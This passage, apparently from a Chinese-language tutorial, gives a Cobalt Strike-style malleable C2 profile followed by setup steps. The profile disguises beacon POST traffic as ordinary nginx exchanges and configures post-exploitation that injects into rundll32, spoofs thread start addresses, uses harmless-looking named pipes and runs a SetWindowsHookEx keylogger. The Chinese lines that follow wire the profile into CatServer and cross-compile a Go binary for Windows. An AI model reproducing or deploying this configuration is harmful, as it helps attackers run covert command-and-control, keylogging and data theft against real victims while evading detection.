# define indicators for an HTTP http-post { # Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided] set uri "/IMXo"; client { #header "Content-Type" "application/octet-stream";
# transmit our session identifier as /submit.php?id=[identifier]
id { mask; netbiosu; prepend "user="; append"%%"; header "User"; }
# post our output with no real changes output { mask; base64url; prepend "data="; append"%%"; print; } }
# The server's response to our HTTP POST server { header "Server""nginx/1.10.3 (Ubuntu)"; header "Content-Type""application/octet-stream"; header "Connection""keep-alive"; header "Vary""Accept"; header "Pragma""public"; header "Expires""0"; header "Cache-Control""must-revalidate, post-check=0, pre-check=0";
# this will just print an empty string, meh... output { mask; netbios; prepend "data="; append"%%"; print; } } }
post-ex { set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe"; set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";
set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000"; set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##"; set keylogger "SetWindowsHookEx"; }
修改 CatServer.properties指定为刚刚创建的c2.profile
修改客户端的相关选项为false
编译运行
在Linux下面编译运行
1
CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build main.go